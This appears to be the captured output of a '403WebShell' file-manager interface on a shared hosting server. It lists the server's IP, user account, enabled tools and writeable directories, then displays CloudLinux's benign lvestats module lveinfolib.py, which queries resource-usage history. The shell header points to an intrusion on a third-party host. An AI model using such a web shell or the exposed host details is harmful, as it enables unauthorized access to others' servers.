Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.133.153.232
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/lveinfolib.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

# pylint: disable=too-many-lines

import copy
import datetime
import logging
import pwd
import time
import warnings

from sqlalchemy import Float, Integer, text
from sqlalchemy import exc as sa_exc
from sqlalchemy.sql import and_, asc, desc, label, not_, or_, select
from sqlalchemy.sql.expression import ColumnElement, alias, case, cast, func

from lvestats.core.plugin import LveStatsPluginTerminated
from lvestats.lib.commons.dateutil import (
    gm_datetime_to_unixtimestamp,
    gm_to_local,
    local_to_gm,
    round_1m,
    str_to_timedelta,
    unixtimestamp_to_gm_datetime,
)
from lvestats.lib.commons.func import (
    get_current_max_lve_id,
    skip_user_by_maxuid,
)
from lvestats.lib.commons.sizeutil import convert_bytes, convert_powers_of_1000, mempages_to_bytes
from lvestats.lib.config import (
    HIDE_MAX_UID_LVE_PARAMETER,
    read_config,
    str_to_bool,
)
from lvestats.orm import LVE_STATS_2_TABLENAME_PREFIX, history, history_x60, servers

# Names exported when this module is star-imported.
__all__ = ('HistoryShow', 'HistoryShowUnion', 'OutputFormatter', 'get_lve_version')


def get_lve_version(dbengine, server_id):
    """
    Read the lve_version stored in the servers table for the given server.

    :param dbengine: database engine; the query runs inside ``dbengine.begin()``
    :param server_id: value matched against ``servers.server_id``
    :return int: stored version, or 6 when the query returns no rows
    """
    fallback_version = 6
    version_query = select([servers.lve_version]).where(servers.server_id == server_id)
    with dbengine.begin() as connection:
        result = connection.execute(version_query)
        if not result.returns_rows:
            return fallback_version
        row = result.fetchone()
        if row is None:
            return fallback_version
        return int(row['lve_version'])


def servers_info(dbengine):
    """
    Execute a select of (server_id, lve_version) over the servers table.

    :param dbengine: database engine used to execute the query
    :return: whatever ``dbengine.execute`` returns for that query
    """
    wanted_columns = [servers.server_id, servers.lve_version]
    return dbengine.execute(select(wanted_columns))


def convert_key_to_label(key_):
    """
    Build the label for a key: the key converted to lowercase.

    :param str key_: key to convert
    :return str: lowercased key
    """
    lowered = str.lower(key_)
    return lowered


def add_labes_to_column(func_dict):
    """
    Return a copy of the mapping in which every ColumnElement value is labeled
    (SQL ".. as ..") with the lowercased key; other values are kept as they are.

    :param dict func_dict: key -> sqlalchemy expression (or any other object)
    :return dict: same keys, values labeled where applicable
    """
    return {
        key_: (
            label(convert_key_to_label(key_), value)
            if issubclass(value.__class__, ColumnElement)
            else value
        )
        for key_, value in func_dict.items()
    }


def convert_to_list(arg):
    """
    Wrap a lone str or int into a one-element list; any other value is returned unchanged.

    :param arg: value to normalise
    :return: ``[arg]`` for str/int, otherwise ``arg`` itself
    """
    return [arg] if isinstance(arg, (str, int)) else arg


class OutputFormatter(object):
    """
    Lazily converts raw rows for output.

    Every row is an iterable whose items positionally match ``fields``.
    Conversion callables ("orders") registered through ``add_order`` are applied
    to the cells of the fields they were registered for, in registration order.
    """

    def __init__(self, fields, rows=None, orders=None):
        """
        :param iterable fields: field names, in the positional order of row items
        :param list|None rows: raw rows; an empty list is used when omitted
        :param iterable|None orders: (fields, order) pairs, each forwarded to add_order
        """
        self.rows = rows or []
        self.fields = list(fields)
        # Build from the materialised list so a one-shot iterable is not consumed twice.
        self._fields_lowered = [_.lower() for _ in self.fields]  # used to match orders
        self._orders = []
        self._hidden_fields = set()  # names of fields to hide

        if orders:
            for field, order in orders:
                self.add_order(field, order)

    def get_fields(self):
        """
        :return list: field names that are not hidden (compared in their original spelling)
        """
        if self._hidden_fields:
            return [f_ for f_ in self.fields if f_ not in self._hidden_fields]
        else:
            return self.fields

    def set_rows(self, rows):
        """
        Use this method if you used hide_fields
        number of items in a row must be the same as in fields after hide
        """
        self.rows = rows

    def hide_fields(self, h_fields):
        """
        Add names to the set of hidden fields (names are stored unchanged).

        :param tuple|list h_fields:
        :return:
        """
        self._hidden_fields = self._hidden_fields.union(set(h_fields))

    def add_order(self, fields, order):
        """
        Register a conversion for the cells of the given fields.

        :param list|tuples fields: field names (matched case-insensitively)
        :param order: callable applied to a cell value, or the name of an
                      attribute of this object (e.g. a built-in order such as 'bytes')
        :raises ValueError: if a name does not resolve to an attribute, or the
                            resolved attribute is not callable
        :return:
        """
        if isinstance(order, str):
            try:
                order = getattr(self, order)
            except AttributeError as e:
                raise ValueError(f'Non such {order} order') from e
            if not hasattr(order, '__call__'):
                raise ValueError(f'input object {order} must be callable')
        self._orders.append(({_.lower() for _ in fields}, order))

    def _convert_line(self, row_):
        """
        Apply the registered orders to one row and drop hidden cells.

        :param iterable row_:
        :return list: converted row
        """
        row_ = list(row_)
        row_out = []
        for field_, r_ in zip(self._fields_lowered, row_):
            # NOTE(review): the lowercased name is tested here, while hide_fields stores
            # names unchanged and get_fields tests the original spelling - confirm the
            # casing callers are expected to pass.
            if field_ in self._hidden_fields:  # continue if field must be hidden
                continue
            # several orders may apply to one cell
            for order_fields, order in self._orders:
                if field_ in order_fields:
                    try:
                        r_ = order(r_)
                    except (TypeError, ValueError, KeyError, IndexError):
                        # best effort: a cell the order cannot convert is left as it is
                        pass
            row_out.append(r_)
        return row_out

    def __iter__(self):
        for row_ in self.rows:
            yield self._convert_line(row_)

    def __getitem__(self, index):
        """
        :param int|slice index:
        :return list: one converted row, or a list of converted rows for a slice
        """
        if isinstance(index, slice):
            # Pass the slice through untouched so that its step is honoured too.
            return list(map(self._convert_line, self.rows[index]))
        return self._convert_line(self.rows[index])

    def __len__(self):
        return len(self.rows)

    def get_corrected_list(self):
        """
        :return list: all rows, converted
        """
        return list(self)

    # built-in orders
    @staticmethod
    def strftime(value, format_='%m-%d %H:%M'):
        return value.strftime(format_)

    @staticmethod
    def percentage(value):
        """
        Format a fraction as a percentage string, e.g. 0.5 -> '50.0%'.

        :param value: number or numeric string; None gives '-'
        :return: percentage string, or the value unchanged if it is not numeric
        """
        if value is None:
            return '-'
        try:
            number = float(value)
        except (TypeError, ValueError):
            return value
        if isinstance(value, str):
            # "str * 100" would repeat the text instead of multiplying the number
            value = number
        return str(value * 100) + '%'

    @staticmethod
    def bytes(value):
        if value is None:
            return '-'
        return convert_bytes(value)

    @staticmethod
    def powers_of_1000(value):
        if value is None:
            return '-'
        return convert_powers_of_1000(value)

    @staticmethod
    def username(value):
        """
        Resolve a uid to the user name; the value is returned unchanged if no such user exists.
        """
        try:
            return pwd.getpwuid(int(value)).pw_name
        except KeyError:
            return value

    @staticmethod
    def datetime(value):
        """
        Convert unix timestamp to datetime (local timezone)
        """
        return datetime.datetime.fromtimestamp(value)


def enumerate_duplicate_columns(columns):
    """
    Give repeated columns distinct names so that all of them can be put into one select.

    Columns are considered equal when their ``str()`` forms match. The second and
    later occurrences are relabeled "<name>_2", "<name>_3", ...; the first is kept.

    :param list|tuple columns: column names or sqlalchemy expressions
    :return list: columns in the original order, duplicates relabeled
    """
    occurrences = {}  # str(column) -> how many times it has been seen so far
    enumerated = []
    for column in columns:
        column_text = str(column)
        seen_before = occurrences.get(column_text, 0)
        if seen_before >= 1:
            # "column in columns" does not work for sqlalchemy classes, hence the str() comparison
            base_name = column if isinstance(column, str) else column.name
            column = label(base_name + '_' + str(seen_before + 1), column)
        enumerated.append(column)
        occurrences[column_text] = seen_before + 1
    return enumerated


# Lowercased average ("a...") and maximum ("m...") field name -> lowercased limit ("l...") field name.
usage_to_limit_dict = {
    (prefix + resource).lower(): ('l' + resource).lower()
    for resource in ('CPU', 'VMem', 'EP', 'PMem', 'Nproc', 'IO', 'IOPS')
    for prefix in ('a', 'm')
}

# Output field name -> name of the history table column it is computed from.
# Average (a*), usage (u*) and maximum (m*) fields of one resource share a column.
FIELD_TO_TABLE_COLUMN = {
    'ID': 'id',
    'aCPU': 'cpu',
    'aVMem': 'mem',
    'aEP': 'mep',
    'aPMem': 'memphy',
    'aIO': 'io',
    'aNproc': 'nproc',
    'aIOPS': 'iops',
    'lCPU': 'cpu_limit',
    'lEP': 'mep_limit',
    'lVMem': 'mem_limit',
    'lPMem': 'lmemphy',
    'lIO': 'io_limit',
    'lNproc': 'lnproc',
    'lIOPS': 'liops',
    'VMemF': 'mem_fault',
    'PMemF': 'memphy_fault',
    'EPf': 'mep_fault',
    'NprocF': 'nproc_fault',
    'CPUf': 'cpu_fault',
    'IOf': 'io_fault',
    'IOPSf': 'iops_fault',
    'uCPU': 'cpu',
    'uEP': 'mep',
    'uVMem': 'mem',
    'uPMem': 'memphy',
    'uIO': 'io',
    'uNproc': 'nproc',
    'uIOPS': 'iops',
    'mCPU': 'cpu',
    'mEP': 'mep',
    'mVMem': 'mem',
    'mPMem': 'memphy',
    'mNproc': 'nproc',
    'mIO': 'io',
    'mIOPS': 'iops',
}

# Field groups. The lists are positionally parallel (same resource at the same index):
# code in this module maps between groups via FIELD_X[FIELD_Y.index(item)].
FIELD_AVERAGE = ['aCPU', 'aVMem', 'aPMem', 'aEP', 'aNproc', 'aIO', 'aIOPS']
FIELD_LIMIT = ['lCPU', 'lVMem', 'lPMem', 'lEP', 'lNproc', 'lIO', 'lIOPS']
FIELD_FAULT = ['CPUf', 'VMemF', 'PMemF', 'EPf', 'NprocF', 'IOf', 'IOPSf']
FIELD_USAGE = ['uCPU', 'uVMem', 'uPMem', 'uEP', 'uNproc', 'uIO', 'uIOPS']
FIELD_MAX = ['mCPU', 'mVMem', 'mPMem', 'mEP', 'mNproc', 'mIO', 'mIOPS']

# Uppercased field name -> canonical spelling; lets column names be looked up case-insensitively.
KEYS_NORMALIZATION_LOOKUP_TABLE = dict(FROM='From', TO='To', ANYF='anyF')
for key in FIELD_TO_TABLE_COLUMN:
    KEYS_NORMALIZATION_LOOKUP_TABLE[key.upper()] = key


def normalize_optional_column_names(names):
    """
    Same as normalize_column_names, but None is passed through as None.

    :param iterable|None names: column names in any letter case
    :return list|None: canonical column names
    """
    return None if names is None else normalize_column_names(names)


def normalize_column_names(names):
    """
    Normalize every name with normalize_column_name.

    :param iterable names: column names in any letter case
    :return list: canonical column names, in input order
    """
    return [normalize_column_name(raw_name) for raw_name in names]


def normalize_column_name(name):
    """
    Convert a column name given in any letter case to its canonical spelling.

    :param str|None name: column name
    :return str|None: canonical name; None for an empty/None name
    :raises KeyError: if the uppercased name is not in KEYS_NORMALIZATION_LOOKUP_TABLE
    """
    if not name:
        return None
    return KEYS_NORMALIZATION_LOOKUP_TABLE[name.upper()]


# (time unit, alignment function) pairs, from the finest unit to the coarsest.
# Each function takes a datetime and returns an earlier-or-equal datetime; the
# seconds/microseconds of the input are not modified by any of them.
#   '10m': goes back (minute % 10) minutes and then 10 more minutes
#   '1h':  drops the minutes; if the minutes are already 0, goes back one hour instead
#   '1d':  sets hour and minute to 0
time_unit_orders = [
    ('10m', lambda dt: dt - datetime.timedelta(minutes=dt.minute % 10 + 10)),
    ('1h', lambda dt: dt.replace(minute=0) if dt.minute else dt - datetime.timedelta(hours=1)),  # round to hour
    ('1d', lambda dt: dt.replace(hour=0, minute=0)),  # round to day
]


def dyn_time_unit_groups(period_from, period_to):
    """
    Split a period into consecutive sub-periods, each with its own time unit.

    Starts with one '1m' range [round_1m(period_from), round_1m(period_to + 1 minute)].
    For every entry of time_unit_orders, the current second boundary is aligned with
    the entry's function; if the aligned point is at least one such unit after the
    start, it is inserted as a new boundary and the unit is recorded. Finally the
    start is aligned with the function of the last recorded unit.

    :param datetime.datetime period_from:
    :param datetime.datetime period_to:
    :return list: tuples (<From|datetime>, <To|datetime>, <time-unit in seconds|int>),
                  the '1m' range first
    """
    boundaries = [round_1m(period_from), round_1m(period_to + datetime.timedelta(minutes=1))]
    used_units = ['1m']
    align_start = round_1m
    for unit_name, align in time_unit_orders:
        split_point = align(boundaries[1])
        if split_point - boundaries[0] >= str_to_timedelta(unit_name):
            align_start = align
            boundaries.insert(1, split_point)
            used_units.append(unit_name)
    boundaries[0] = align_start(boundaries[0])
    # units were recorded finest first, boundaries are ordered in time: walk boundaries from the end
    return [
        (
            boundaries[-position - 2],
            boundaries[-position - 1],
            int(str_to_timedelta(unit_name).total_seconds()),
        )
        for position, unit_name in enumerate(used_units)
    ]


class HistoryShow(object):
    def __init__(
        self,
        dbengine,
        period_from,
        period_to,
        uid=None,
        show_columns=None,
        server_id='localhost',
        time_unit=None,
        order_by=None,
        by_usage=None,
        by_usage_percentage=0.9,
        by_fault=None,
        threshold=1,
        limit=0,
        table=None,
        log=None,
        time_count=None,
        show_idle=False,
    ):
        """
        Show different statistics from history table
        :param sqlalchemy.engine.base.Engine dbengine: database engine to use
        :param datetime.datetime|float|int period_from:  start time retrieve data
        :param datetime.datetime|float|int period_to:    end time retrieve data
        :param int|None|list|tuple uid:                  filter the output information to the user uid
        :param tuple|list show_columns:        display columns in the order specified. If not, show all supported
                valid column names: 'aCPU', 'lPMem', 'uIO', 'uEP', 'lEP', 'aVMem', 'PMemF', 'lVMem', 'NprocF', 'anyF',
                'aNproc', 'VMemF', 'ID', 'lCPU', 'aIOPS', 'aEP', 'aPMem', 'uPMem', 'lIO', 'lIOPS', 'uCPU',
                'lNproc', 'aIO', 'uIOPS', 'EPf', 'uVMem', 'uNproc'

        :param str server_id:                  filtering the output for "server id"
        :param int time_unit:                  grouping output over an interval of time (in seconds)
        :param str|None order_by:              sorting output by column name (supported by columns)
        :param str|tuple|list by_usage:        filtering are grouped data for the percentage of the use of resources
        :param float by_usage_percentage:      percent for the parameter setting 'by_usage'
        :param str|tuple|list|None by_fault:   filtering data are grouped for quantity faults
                                               (None if it is not filtered)
            valid names: 'aCPU', 'lPMem', 'uIO', 'uEP', 'lEP', 'aVMem', 'PMemF', 'lVMem', 'NprocF', 'anyF', 'aNproc',
            'VMemF', 'ID', 'lCPU', 'aIOPS', 'aEP', 'aPMem', 'uPMem', 'lIO', 'lIOPS', 'uCPU', 'lNproc', 'aIO', 'uIOPS',
            'EPf', 'uVMem', 'uNproc'
        :param threshold:                      number faults for filtering the data are grouped
                                               (used together with by_fault)
        :param int|None limit:                 limit on the number of output data
                                               (if 0 or None, then the limit is not set)
        :param table:                          table to query; the history table is used when None
        :param log:                            logger for the generated SQL and query timings;
                                               the 'SQL' logger is used when omitted
        :param int|None time_count:            precomputed result of get_time_count(); when falsy,
                                               get_time_count() is executed here
        :param bool show_idle:                 accepted, but not used by this constructor
        :raises KeyError:                      if a column name is not a supported one
        """
        self.dbengine = dbengine
        self.uid = uid
        # anything that is not an int (None, list, tuple) is handled as a query over several users
        self._is_multi_uids = not isinstance(uid, int)
        if show_columns is None:
            show_columns = get_supported_columns(lve_version=get_lve_version(dbengine=dbengine, server_id=server_id))
            show_columns.insert(0, 'ID')
        self.show_columns = normalize_column_names(show_columns)
        self.server_id = server_id
        self.time_unit = time_unit
        # A single name may be given as a plain str; wrap it first, otherwise it would be
        # normalized character by character and fail with KeyError.
        self.by_fault = normalize_optional_column_names(convert_to_list(by_fault))
        if order_by:
            self.order_by = normalize_column_name(order_by)
        elif self.by_fault and normalize_column_name('anyF') in self.by_fault:
            self.order_by = normalize_column_name('CPUf')
        else:
            # None (and not the empty by_fault list itself) when there is nothing to order by:
            # order_by is later put into a set and therefore must be hashable
            self.order_by = self.by_fault[0] if self.by_fault else None
        self.by_usage = normalize_optional_column_names(convert_to_list(by_usage))
        self.by_usage_percentage = by_usage_percentage
        self.threshold = threshold
        self.limit = limit
        self.log = log or logging.getLogger('SQL')

        self.table = table if table is not None else history.__table__  # "or" not supported in this
        self._table_alive = alias(self.table, 'alive')  # alias of main table to using in self join
        # both period bounds are kept as unix timestamps
        self.period_from = (
            period_from if isinstance(period_from, (int, float)) else gm_datetime_to_unixtimestamp(period_from)
        )
        self.period_to = period_to if isinstance(period_to, (int, float)) else gm_datetime_to_unixtimestamp(period_to)
        # get_time_count() reads log, dbengine, server_id and the period: keep it after them
        self.time_count = time_count or self.get_time_count()
        # correct cpu/100
        # we still have to round it, as it seems <[27.333/100] = [0.27332999999999996] - who knows why :(
        self.result_corrector = OutputFormatter(
            fields=self.show_columns,
            orders=[
                [FIELD_MAX + FIELD_AVERAGE + FIELD_LIMIT + FIELD_USAGE, lambda x: round(x, 3)],
                [['aCPU', 'lCPU', 'mCPU'], lambda item: round(float(item) / 100.0, 5)],
            ],
        )
        self.hide_maxuid_lve = str_to_bool(read_config().get(HIDE_MAX_UID_LVE_PARAMETER, 'true'))

    def set_normalised_output(self):
        """
        Register additional output conversions on the result corrector:
        EP/Nproc/IOPS values become rounded ints, for non-sqlite engines numeric
        cells are converted to float (faults to int), and memory values are
        converted with mempages_to_bytes.
        """
        register = self.result_corrector.add_order
        memory_fields = ['aVMem', 'mVMem', 'lVMem', 'aPMem', 'mPMem', 'lPMem']

        # round EP IOPS Nproc output
        register(
            fields=['aEP', 'mEP', 'lEP', 'aNproc', 'mNproc', 'lNproc', 'aIOPS', 'mIOPS', 'lIOPS'],
            order=lambda x: int(round(x)),
        )

        if self.dbengine.url.drivername != "sqlite":
            io_fields = ['aIO', 'mIO', 'lIO']
            usage_fields = ['uCPU', 'uEP', 'uVMem', 'uPMem', 'uIO', 'uNproc', 'uIOPS']
            register(fields=memory_fields + io_fields + usage_fields, order=float)
            register(fields=['EPf', 'VMemF', 'CPUf', 'PMemF', 'NprocF', 'IOf', 'IOPSf'], order=int)

        # convert Mem to bytes (registered last, so it runs after the float conversion)
        register(fields=memory_fields, order=mempages_to_bytes)

    def _where_time_period(self, table=None):
        """
        Generate WHERE created BETWEEN <period_from> AND <period_to>

        :param table: table (or alias) whose "created" column is filtered; self.table when None
        :return: sqlalchemy condition
        """
        target = self.table if table is None else table
        return target.c.created.between(self.period_from, self.period_to)

    def _where_server_id(self):
        """
        Generate WHERE server_id = '<self.server_id>' for self.table

        :return: sqlalchemy condition
        """
        server_column = self.table.c.server_id
        return server_column == self.server_id

    def _where_uid(self, uid=-1, table=None):
        """
        Generate the WHERE condition on the "id" column.

        :param uid: -1 means "use self.uid"; None selects all ids > 0 (optionally
                    without the max-uid range); a list/tuple gives "id IN (...)";
                    anything else gives "id = uid"
        :param table: table (or alias) to filter; self.table when None
        :return: sqlalchemy condition
        """
        target = self.table if table is None else table
        wanted = self.uid if uid == -1 else uid
        id_column = target.c.id

        if wanted is None:
            if not self.hide_maxuid_lve:
                return id_column > 0
            # skip ids in range(MAX_UID, MAX_LVE_ID), because ids > MAX_LVE_ID may contain info
            # about reseller`s limits
            return and_(
                id_column > 0,
                or_(not_(skip_user_by_maxuid(id_column)), id_column > get_current_max_lve_id()),
            )

        if isinstance(wanted, (list, tuple)):
            if self.dbengine.url.drivername != 'sqlite':
                # mysql or postgresql do not have a limit on the number of variables
                return id_column.in_(list(wanted))
            # little workaround for sqlite's limit of 999 variables:
            # compile the IN clause manually with the values inlined
            compiled = id_column.in_(list(wanted)).expression.compile(compile_kwargs={"literal_binds": True})
            return text(compiled.string)

        return id_column == wanted

    def get_time_count(self):
        """
        SELECT count(*) FROM lve_stats2_history
        WHERE created BETWEEN xxxx AND yyyy AND id = 0 AND server_id = 'localhost'

        The query and the time it took are written to the debug log.

        :return: first column of the first fetched row (the count)
        """
        conditions = and_(
            history.created.between(self.period_from, self.period_to),
            history.id == 0,
            history.server_id == self.server_id,
        )
        count_query = select([text('count(*)')]).where(conditions)
        started_at = time.time()
        rendered = str(count_query.compile(compile_kwargs={"literal_binds": True}))
        self.log.debug(rendered.replace('\n', ' '))
        result = self.dbengine.execute(count_query)
        self.log.debug('query time: %s', time.time() - started_at)
        fetched = result.fetchall()
        return fetched[0][0]

    def _fun_avg(self, item):
        """
        Generate aggregate function to calculate the average:
        the sum of the column divided by the time count, both cast to Float,
        for example sum(lve_stats2_history.cpu) / 60

        :param item: table column
        :return: sqlalchemy expression
        """
        total = func.sum(item)
        divisor = cast(self._fun_time_count(), Float)
        return cast(total / divisor, Float)

    def _fun_limit(self, item):
        """
        Generate aggregate function to calculate the limit.
        A zero in the limit column means "no limit", so the result is 0 unless
        the smallest value in the group is positive,
        for example CASE WHEN (min(lve_stats2_history.cpu_limit) > 0) THEN max(lve_stats2_history.cpu_limit) ELSE 0 END

        :param item: limit column
        :return: sqlalchemy expression
        """
        always_limited = func.min(item) > 0
        return case([(always_limited, func.max(item))], else_=0)

    def _fun_fault(self, item):
        """
        Generate aggregate function to calculate faults: the sum of the column,
        for example sum(lve_stats2_history.cpu_fault)

        :param item: fault column
        :return: sqlalchemy expression
        """
        fault_total = func.sum(item)
        return fault_total

    def _fun_usage(self, item, item_limit):
        """
        Generate aggregate function to calculate resource usage, i.e. average / limit.
        With <limit> standing for the expression built by _fun_limit, e.g.
            CASE WHEN min(lve_stats2_history.cpu_limit) > 0 THEN max(lve_stats2_history.cpu_limit) ELSE 0 END
        the generated SQL looks like
            CASE
                WHEN (<limit> IS NULL) THEN NULL
                WHEN (<limit> > 0) THEN (sum(lve_stats2_history.cpu) / 1422) / <limit>
            END

        :param item: usage column
        :param item_limit: matching limit column
        :return: sqlalchemy expression; NULL when the limit is NULL or not positive
        """
        # Don't use "is None" here: "== None" is what makes sqlalchemy render "IS NULL".
        # noinspection PyComparisonWithNone
        limit_is_null = self._fun_limit(item_limit) == None  # NOQA
        limit_is_set = self._fun_limit(item_limit) > 0
        usage_ratio = self._fun_avg(item) / self._fun_limit(item_limit)
        return case(
            [
                (limit_is_null, None),
                (limit_is_set, usage_ratio),
            ],
            else_=None,
        )

    def _fun_max(self, item, item_limit, item_fault):
        """
        Generate aggregate function to calculate maximum resource usage; kept for
        backward compatibility with lve-stats 0.x. When the group has faults the
        maximum limit is reported, otherwise the maximum of the column:
            CASE
                WHEN (sum(lve_stats2_history.cpu_fault) > 0)
                THEN max(lve_stats2_history.cpu_limit)
                ELSE max(lve_stats2_history.cpu)
            END

        :param item: usage column
        :param item_limit: matching limit column
        :param item_fault: matching fault column
        :return: sqlalchemy expression
        """
        had_faults = func.sum(item_fault) > 0
        return case([(had_faults, func.max(item_limit))], else_=func.max(item))

    def _fun_time_count(self):
        if self._check_need_join():
            return text('count(*)')
        else:
            return self.time_count

    def _fun_time_from(self):
        if self._is_multi_uids:
            return self.period_from
        else:
            if self._check_need_join():
                _table = self._table_alive
            else:
                _table = self.table
            if self.dbengine.url.drivername == 'sqlite':
                # cast(..., Integer) using for compatibility with lve-stats-2.1-8 database; 'created' saved as float
                return (
                    cast((_table.c.created - self.period_from) / self.time_unit, Integer) * self.time_unit
                    + self.period_from
                )
            else:
                return (
                    func.floor((_table.c.created - self.period_from) / self.time_unit) * self.time_unit
                    + self.period_from
                )

    def _fun_time_to(self):
        # in case of changes here don't forget to check _group_by_query
        if self._is_multi_uids:
            return self.period_to
        else:
            return self._fun_time_from() + self.time_unit

    def _fun_user_id(self):
        """
        Expression for the 'ID' output column: the id column for a multi-user
        query, otherwise the literal text of self.uid.
        """
        id_source = self.table.c.id if self._is_multi_uids else text(str(self.uid))
        return label('ID', id_source)

    def _aggregate_fun_case(self, item):
        """
        Obtain the aggregate function (or plain value) for an output column name
        :param item: 'aCPU', 'aVMem', 'aPMem', 'aEP', 'aNproc',  'aIO', 'aIOPS', 'lCPU', 'lVMem', 'lPMem', 'lEP',
                     'lNproc',  'lIO', 'lIOPS', 'CPUf', 'VMemF', 'PMemF', 'EPf', 'NprocF',  'IOf', 'IOPSf', 'uCPU',
                     'uVMem', 'uPMem', 'uEP', 'uNproc',  'uIO', 'uIOPS', 'mCPU', 'mVMem', 'mPMem', 'mEP',  'mNproc',
                     'mIO', 'mIOPS', 'anyF', 'ID', 'From', 'To'
        :type item: str
        :raises KeyError: if item is none of the names above
        :return:
        """
        columns = self.table.c

        # names that are not backed by a single table column
        if item == 'anyF':
            return func.sum(
                columns.mem_fault
                + columns.memphy_fault
                + columns.mep_fault
                + columns.nproc_fault
                + columns.cpu_fault
                + columns.io_fault
                + columns.iops_fault
            )
        if item == 'ID':
            return self._fun_user_id()
        if item == 'From':
            return self._fun_time_from()
        if item == 'To':
            return self._fun_time_to()

        value_column = getattr(columns, FIELD_TO_TABLE_COLUMN[item])
        if item in FIELD_AVERAGE:
            return self._fun_avg(value_column)
        if item in FIELD_LIMIT:
            return self._fun_limit(value_column)
        if item in FIELD_FAULT:
            return self._fun_fault(value_column)
        if item in FIELD_USAGE:
            # the FIELD_* lists are parallel: same position, same resource
            limit_field = FIELD_LIMIT[FIELD_USAGE.index(item)]
            limit_column = getattr(columns, FIELD_TO_TABLE_COLUMN[limit_field])
            return self._fun_usage(value_column, limit_column)
        if item in FIELD_MAX:
            position = FIELD_MAX.index(item)
            limit_name = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[position]]
            fault_name = FIELD_TO_TABLE_COLUMN[FIELD_FAULT[position]]
            limit_column = getattr(columns, limit_name)
            fault_column = getattr(columns, fault_name)
            return self._fun_max(value_column, limit_column, fault_column)

    def _group_by_query(self, select_query):
        """
        Add GROUP BY, ORDER BY, HAVING and LIMIT to a select.

        Groups by id for a multi-user query and by time interval otherwise; orders by
        self.order_by (descending) if set, else by the grouping key; keeps only groups
        passing the by_usage / by_fault filters; applies self.limit if it is set.

        :param select_query: select produced by select_query()
        :return: the resulting query
        """
        by_usage_list = convert_to_list(self.by_usage)
        by_fault_list = convert_to_list(self.by_fault)
        if self._is_multi_uids:
            query = select_query.group_by(self.table.c.id)
        else:
            # it is correct because in query result all records having the same _fun_time_from()
            # also have same _fun_time_to()
            # so .group_by(_fun_time_to()) doesn't create new groups after .group_by(_fun_time_from())
            # but we need both this group conditions because mysql throws an error otherwise
            query = select_query.group_by(self._fun_time_from()).group_by(self._fun_time_to())
        # the append_* calls below are used for their effect on "query"; their results are not kept
        if self.order_by:
            order_by_aggregate_func = self._aggregate_fun_case(self.order_by)
            query.append_order_by(desc(order_by_aggregate_func))
        else:
            if self._is_multi_uids:
                query.append_order_by(asc(self.table.c.id))
            else:
                query.append_order_by(self._fun_time_from())

        # add filter for having grouped data
        if by_usage_list:  # filter groups by resource usage
            filter_fun_list = []
            for item in by_usage_list:
                if item in FIELD_AVERAGE:
                    # average field: compare the usage (average / limit) with the percentage
                    index = FIELD_AVERAGE.index(item)
                    filter_fun = self.by_usage_percentage <= self._aggregate_fun_case(FIELD_USAGE[index])
                else:
                    # any other name is looked up among the maximum fields
                    # (list.index raises ValueError if it is not one of them)
                    index = FIELD_MAX.index(item)
                    filter_fun = self.by_usage_percentage * self._aggregate_fun_case(
                        FIELD_LIMIT[index]
                    ) <= self._aggregate_fun_case(item)
                filter_fun_list.append(filter_fun)
            # a group passes if at least one of the listed resources matches
            query.append_having(or_(*filter_fun_list))

        if by_fault_list:
            # a group passes if at least one of the listed fault counters reaches the threshold
            by_fault_filter = [self.threshold <= self._aggregate_fun_case(funk_key_) for funk_key_ in by_fault_list]
            query.append_having(or_(*by_fault_filter))
        if self.limit != 0 and self.limit is not None:
            query = query.limit(self.limit)

        return query

    def _columns_query(self):
        """
        Generate output columns for SELECT <_columns_query(self)> FROM ...

        Every name of show_columns is turned into its aggregate expression. A list
        result is added item by item; a single expression is labeled with the column
        name, except for 'From' and 'To'.

        :return list: expressions to select
        """
        selected = []
        for column_name in self.show_columns:
            expression = self._aggregate_fun_case(column_name)
            if isinstance(expression, list):
                selected.extend(expression)
                continue
            if column_name not in ('From', 'To'):  # digest not support label
                expression = label(column_name, expression)
            selected.append(expression)
        return selected

    def _check_need_time_count(self):
        columns = {
            'aCPU',
            'uCPU',
            'aEP',
            'uEP',
            'aVMem',
            'uVMem',
            'aPMem',
            'uPMem',
            'aNproc',
            'uNproc',
            'aIO',
            'uIO',
            'aIOPS',
            'uIOPS',
        }
        return bool(columns & (set(self.show_columns) | {self.order_by} | set(self.by_usage or set())))

    def _check_need_join(self):
        return self._check_need_time_count() and not self._is_multi_uids

    def select_query(self, columns_=None, need_join=False):
        """
        Build the SELECT ... WHERE part of the query (no grouping or ordering).

        Without a join, rows of self.table are filtered by period and uid. With a
        join, the period filter and "id = 0" are applied to the "alive" alias, which
        is outer-joined with self.table on equal "created" and the uid condition.
        The server id filter is added whenever self.server_id is set.

        :param list|None columns_: expressions to select; _columns_query() when None
        :type need_join: bool
        :return: sqlalchemy select
        """
        if columns_ is None:
            columns_ = self._columns_query()

        if need_join:
            conditions = and_(
                self._where_time_period(table=self._table_alive),
                self._where_uid(uid=0, table=self._table_alive),
            )
        else:
            conditions = and_(self._where_time_period(), self._where_uid())
        if self.server_id:  # add filtering by server id
            conditions = and_(conditions, self._where_server_id())

        query = select(columns_).where(conditions)
        if not need_join:
            return query

        join_condition = and_(
            self._table_alive.c.created == self.table.c.created,
            self._where_uid(uid=self.uid),
        )
        return query.select_from(self._table_alive.outerjoin(self.table, join_condition))

    def main_query(self):
        """
        Build the complete query: selected columns, filters (with the join when
        it is needed), then grouping/ordering/having/limit.

        :return: sqlalchemy query
        """
        selected = self._columns_query()
        base_query = self.select_query(columns_=selected, need_join=self._check_need_join())
        return self._group_by_query(base_query)

